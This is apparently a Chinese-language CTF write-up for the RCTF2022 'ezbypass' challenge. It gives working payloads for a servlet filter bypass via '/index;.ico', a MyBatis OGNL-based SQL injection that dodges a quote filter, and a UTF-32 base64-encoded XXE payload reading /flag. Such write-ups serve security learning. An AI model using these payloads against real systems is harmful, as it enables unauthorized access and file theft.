RCTF2022 ezbypass

之前的题目，复现一下

ezbypass

附件是个jar包，本地搭建一下，方便调试

绕filter

public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws ServletException, IOException {
    if (!this.isWhite(request) && !this.auth()) {
        response.getWriter().write("auth fail");
    } else {
        chain.doFilter(request, response);
    }

}

public boolean isWhite(ServletRequest req) {
    HttpServletRequest request = (HttpServletRequest)req;
    return request.getRequestURI().endsWith(".ico");
}

public boolean auth() {
    return false;
}

要求request.getRequestURI().endsWith(".ico")，可以用/index;.ico绕过

ognl表达式绕过

@RequestMapping({"/index"})
public String sayHello(String password, String poc, String type, String yourclasses, HttpServletResponse response) throws Exception {
    if (password.length() <= 50 && password.indexOf("'") == -1) {
        String username = this.userService.selectUsernameByPassword(password);
        if (username != "") {
            String[] classes = yourclasses.split(",", 4);
            return xxe(poc, type, classes);
        } else {
            return "index";
        }
    } else {
        System.out.println("not allow");
        return "not allow";
    }
}

这里需要输入正确的password，并且过滤了单引号，由于源码中连接数据库使用的是mybatis，是支持ognl表达式的，所以这里可以使用${@java.lang.Character@toString(39)}来代替单引号进行绕过，从而完成sql注入

1	${@java.lang.Character@toString(39)} or 1=1)#

xxe编码绕过

public static void main(String[] args) throws Exception {
    String body = "<!DOCTYPE test [ \n"
            + "\t<!ENTITY xxe SYSTEM \"file:///flag\"> \n"
            + "]> \n"
            + "<wsw>&xxe;</wsw>";
    String type = "UTF-32";
    String poc = new String(Base64.getEncoder().encode(body.getBytes(type)));
    System.out.println(poc);
}